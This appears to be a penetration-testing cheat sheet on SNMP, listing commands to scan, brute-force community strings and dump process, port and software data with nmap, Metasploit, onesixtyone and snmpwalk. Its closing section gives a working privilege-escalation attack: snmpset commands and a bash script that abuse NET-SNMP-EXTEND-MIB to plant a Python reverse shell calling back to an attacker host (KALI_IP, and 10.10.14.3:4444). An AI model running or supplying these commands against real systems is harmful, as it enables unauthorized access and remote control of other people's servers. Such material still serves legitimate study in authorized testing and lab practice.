Basic info About SNMP
Ports - 161,162,10161,10162/udp
SNMP is a based on UDP, stateless protocol --> susceptible to IP spoofing and replay attacks.
SNMP1, SNMP2, SNMP2C --> can be locally irrupted over a local network.
SNMP is a UDP protocol & UDP scanning that UDP requires a matching port and payload or it won't respond.
This means we have to get the community string correct or we won't get any sort of a response.
In-case, when a response is received, it contains the community string, and the scanner can
identify the valid community string.
MIB-values
1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software's Installed & Hotfixes
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
1.3.6.1.2.1.1.1 System Description
|
OID and MIB Hierarchy - the way MIB-Values are created
|
Enum via NMAP
#Run SNMP Nmap Scripts
nmap -sCUV -p161 --script=snmp-info,snmp-interfaces,snmp-netstat,snmp-sysdescr,snmp-processes,snmp-win32-software 10.10.10.10
#Brute forcing communitystrings
nmap -sUCV -Pn -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.10.10
#Run all scripts related to snmp
nmap -sU -p 161 --script snmp-* -Pn 10.10.10.10
Metasploit
#SNMP ENUM
use scanner/snmp/snmp_enum
set RHOSTS 10.10.10.0/24
run
#Find SNMP Shares
use auxiliary/scanner/snmp/snmp_enumshares
#SNMP_Login
use auxiliary/scanner/snmp/snmp_login
set PASS_FILE /usr/share/wordlists/rockyou.txt
set RHOSTS 10.10.10.0/24
run
Check this for SMBPSet
Enum via SNMPENUM Script
git clone https://github.com/ajohnston9/snmpenum.git
perl snmpenum.pl 10.11.1.115 public linux.txt
Enumeration using OneSixtyOne
#Checks for given Community Strings for given IP addresses
for ip in$(seq 100 254) ;do echo 192.168.31.$ip; done > ips.txt
or
prips 10.10.10.0/24 > targets.txt
Community Strings sample path = /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt
#brute force community strings against IP Addresses
onesixtyoone -c community_strings.txt -i ips.txt
#multiple communities against a single host
onesixtyone -c community_strings.txt 10.10.10.1
#Multiple Targets against a single Community string
onesixtyone -i ips.txt public
Enum Using snmpwalk
snmpwalk -c public 10.10.10.1 -v 2c
snmpwalk -c pr1v@te 10.10.10.1 -v 2c
#/v1= SNMP version1, -c =community string - public
snmpwalk -c public -v1 192.168.11.130
#Get Running Processes
snmpwalk -c public 192.168.11.130 1.3.6.1.2.1.25.4.2.1.2
#Get Open TCP Ports
snmpwalk -c public 192.168.11.130 1.3.6.1.2.1.6.13.1.3
#SNMP Extended List
sudo apt-get install snmp-mibs-downloader
sudo download-mibs
sudo nano /etc/snmp/snmp.conf
mibs +ALL #Add NEW MIBS
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
Enum using snmpbulkwalk
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] .
snmpbulkwalk -c public -v2c 10.10.10.10 .
Enum Using SNMPCheck
#Basic Syntax
snmpcheck -t 10.10.1.1 -c public
Priv Esc when you have snmpd.conf - rwcommunity string
sudo apt-get install snmp-mibs-downloader
sudo download-mibs
sudo nano /etc/snmp/snmp.conf
mibs +ALL #Add NEW MIBS
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10
‘nsExtendStatus.”evilcommand”‘ = createAndGo
‘nsExtendCommand.”evilcommand”‘ = /usr/bin/python3
‘nsExtendArgs.”evilcommand”‘ = ‘-c “import
sys,socket,os,pty;s=socket.socket();s.connect((\”KALI_IP\”,PORT));[os.dup2(s.fileno(),fd)
for fd in (0,1,2)];pty.spawn(\”/bin/sh\”)”‘
#Find the ISO
snmpwalk -v 2c -c PASSWORD 10.10.10.10
Automating the task using python:
nano snmp-shell.sh
#!/bin/bash
random="holyshit"
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 \
"nsExtendStatus.\"${random}\"" = createAndGo \
"nsExtendCommand.\"${random}\"" = /usr/bin/python3 \
"nsExtendArgs.\"${random}\"" = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.3\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
snmpwalk -v 2c -c
PASSWORD 10.10.10.10
1.3.6.1.4.1.8072.1.3.2
Comments
Post a Comment